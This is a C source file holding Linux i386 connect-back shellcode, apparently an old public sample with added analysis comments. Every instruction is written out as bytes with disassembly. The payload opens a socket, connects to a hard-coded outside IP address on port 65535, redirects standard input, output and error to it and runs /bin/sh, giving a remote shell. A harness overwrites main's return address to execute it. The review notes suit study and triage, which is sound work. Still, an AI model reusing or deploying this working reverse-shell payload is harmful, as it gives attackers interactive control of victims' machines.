/*
 * connectback, execve /bin/sh linux shellcode by BreeZe <breeze@binbash.org>
 */

/*
 * One-line description printed by main(). The "/bin/sh /bin/sh 0" part
 * presumably spells out the execve arguments (path, argv[0], NULL
 * terminator) — inferred from the execve block below, not stated here.
 * The port named here must agree with the movw immediate in the connect
 * block; the IP is only given there.
 */
#define info    "connectback execve /bin/sh /bin/sh 0 to port 65535"

#include <stdio.h>

/*
 * The payload: one string literal per instruction, each annotated with the
 * matching i386 disassembly. Linux/i386 only (int $0x80, 32-bit registers).
 *
 * Reading notes for triage:
 *  - syscalls used: socketcall (%eax = 0x66) twice, dup2 (%eax = 0x3f)
 *    three times, execve (%eax = 0xb) once.
 *  - the socket/connect argument blocks are built relative to the
 *    *caller's* %ebp (offsets 0x8..0x1b), so the payload clobbers whatever
 *    stack frame it executes in.
 *  - the destination is hard-coded: the movw immediate (port) and the movl
 *    immediate (IPv4 address) in the connect block are the only
 *    sample-specific constants, and the ones to extract from a captured
 *    variant.
 *  - the literal contains no \x00 byte; the NUL that terminates "/bin/sh"
 *    is written at run time (mov %al,0x7(%esi)), which is why strlen() in
 *    main() reports the full length.
 */
char shellcode[] =    

/* socket: socketcall(SYS_SOCKET=1 in %ebx, args {2, 1, 0} at 0x8(%ebp)),
 * i.e. domain 2 (AF_INET), type 1 (SOCK_STREAM), protocol 0. */
"\x31\xc0"			// xor    %eax,%eax
"\x89\x45\x10"			// mov    %eax,0x10(%ebp)
"\x40"				// inc    %eax
"\x89\xc3"			// mov    %eax,%ebx
"\x89\x45\x0c"			// mov    %eax,0xc(%ebp)
"\x40"				// inc    %eax
"\x89\x45\x08"			// mov    %eax,0x8(%ebp)
"\x8d\x4d\x08"			// lea    0x8(%ebp),%ecx
"\xb0\x66"			// mov    $0x66,%al
"\xcd\x80"			// int    $0x80

/* connect: socketcall(SYS_CONNECT=3 in %ebx, args {fd, &sockaddr, 16} at
 * 0x8(%ebp)). The sockaddr_in is assembled at 0x14(%ebp): family 2 (the
 * %ebx value stored while it is still 2), port word at +2, address dword
 * at +4. The fd returned by the socket call (%eax) is stored as the first
 * argument but is NOT copied into %ebx — see the dup2 note below. */
"\x89\x45\x08"			// mov    %eax,0x8(%ebp)
"\x43"				// inc    %ebx
"\x89\x5d\x14"			// mov    %ebx,0x14(%ebp)
"\x43"				// inc    %ebx
"\x66\xc7\x45\x16\xff\xff"	// movw   $0xffff,0x16(%ebp) (port: 65535 -> 0xffff; same bytes in host and network order)
"\xc7\x45\x18\xc6\x51\x81\x64"	// movl   $0x648151c6,0x18(%ebp) (ip: 198.81.129.100 -> hex value: 0x648151c6; stored as bytes c6 51 81 64, i.e. network order)
"\x8d\x55\x14"			// lea    0x14(%ebp),%edx
"\x89\x55\x0c"			// mov    %edx,0xc(%ebp)
"\xc6\x45\x10\x10"		// movb   $0x10,0x10(%ebp)
"\xb0\x66"			// mov    $0x66,%al
"\xcd\x80"			// int    $0x80

/* dup2(%ebx, 0): %ebx is still 3 from the SYS_CONNECT setup above and is
 * never loaded with the fd the socket call returned, so the three dup2
 * calls only redirect the right descriptor when the new socket happened
 * to receive fd 3 (the case in a process with just stdin/stdout/stderr open). */
"\x31\xc9"			// xor    %ecx,%ecx
"\xb0\x3f"			// mov    $0x3f,%al
"\xcd\x80"			// int    $0x80

/* dup2(%ebx, 1) */
"\x41"				// inc    %ecx
"\xb0\x3f"			// mov    $0x3f,%al
"\xcd\x80"			// int    $0x80

/* dup2(%ebx, 2) */
"\x41"				// inc    %ecx
"\xb0\x3f"			// mov    $0x3f,%al
"\xcd\x80"			// int    $0x80

/* jump to G2C: skips the 26-byte execve block below so the call at G2C can
 * push the address of the trailing string (jmp/call/pop position-independence idiom) */
"\xeb\x1a"			// jmp    80480e9 <G2C>

/* start <shellcode> */
/* execve("/bin/sh", argv = {ptr, NULL}, envp = {NULL}): %esi holds the
 * address of the trailing data pushed by the call; the code NUL-terminates
 * the path at +7, stores the path pointer at +8 and a NULL dword at +12,
 * then passes %ebx = path, %ecx = +8 (argv), %edx = +12 (envp). */
"\x5e"				// pop    %esi
"\x31\xc0"			// xor    %eax,%eax
"\x88\x46\x07"			// mov    %al,0x7(%esi)
"\x8d\x1e"			// lea    (%esi),%ebx
"\x89\x5e\x08"			// mov    %ebx,0x8(%esi)
"\x89\x46\x0c"			// mov    %eax,0xc(%esi)
"\xb0\x0b"			// mov    $0xb,%al
"\x89\xf3"			// mov    %esi,%ebx
"\x8d\x4e\x08"			// lea    0x8(%esi),%ecx
"\x8d\x56\x0c"			// lea    0xc(%esi),%edx
"\xcd\x80"			// int    $0x80

/* G2C: the call (displacement -31) lands on the pop %esi above and leaves
 * the address of the bytes that follow it on the stack. */
"\xe8\xe1\xff\xff\xff"		// call   80480cf <shellcode>
/* Everything from here on is DATA, not code — the disassembler has rendered
 * ASCII as instructions. Bytes +0..+6 are "/bin/sh"; +7 ('T') is overwritten
 * with NUL, +8..+11 ("ROEP") with the path pointer and +12..+15 ("JUHS")
 * with NULL by the execve block, so the 9 trailing letters are just
 * NUL-free placeholders. */
"\x2f"				// das
"\x62\x69\x6e"			// bound  %ebp,0x6e(%ecx)
"\x2f"				// das
"\x73\x68"			// jae    804815d <G2C+0x74>
"\x54"				// push   %esp
"\x52"				// push   %edx
"\x4f"				// dec    %edi
"\x45"				// inc    %ebp
"\x50"				// push   %eax
"\x4a"				// dec    %edx
"\x55"				// push   %ebp
"\x48"				// dec    %eax
"\x53"				// push   %ebx
;

/*
 * Test harness: prints the payload description and length, then transfers
 * control to the byte array by overwriting main()'s own saved return
 * address. Nothing here is portable — it assumes a 32-bit frame in which
 * `ret` sits directly below the saved %ebp, so that (&ret + 2) is the
 * return-address slot, and it needs the data section to be executable.
 * Both assumptions are undefined behaviour from the C standard's point of
 * view and fail under the default NX / stack-protector settings of
 * current toolchains.
 *
 * NOTE(review): strlen() is used without #include <string.h> (implicit
 * declaration — an error on GCC 14+ / C23); "%d" is passed a size_t
 * (should be "%zu"); (int)shellcode truncates the pointer on 64-bit
 * targets, consistent with the i386-only payload above.
 */
int
main()
{
	int *ret;
	/* pointer arithmetic past the object: frame-layout dependent, UB */
	ret = (int *)&ret + 2;
	printf("Shellcode info = %s\n",info);
	/* strlen stops at the first NUL; the literal above has none, so this
	 * is the full payload size */
	printf("Shellcode length = %d\n",strlen(shellcode));
	/* overwrite the saved return address; the jump happens at function exit */
	(*ret) = (int)shellcode;
}
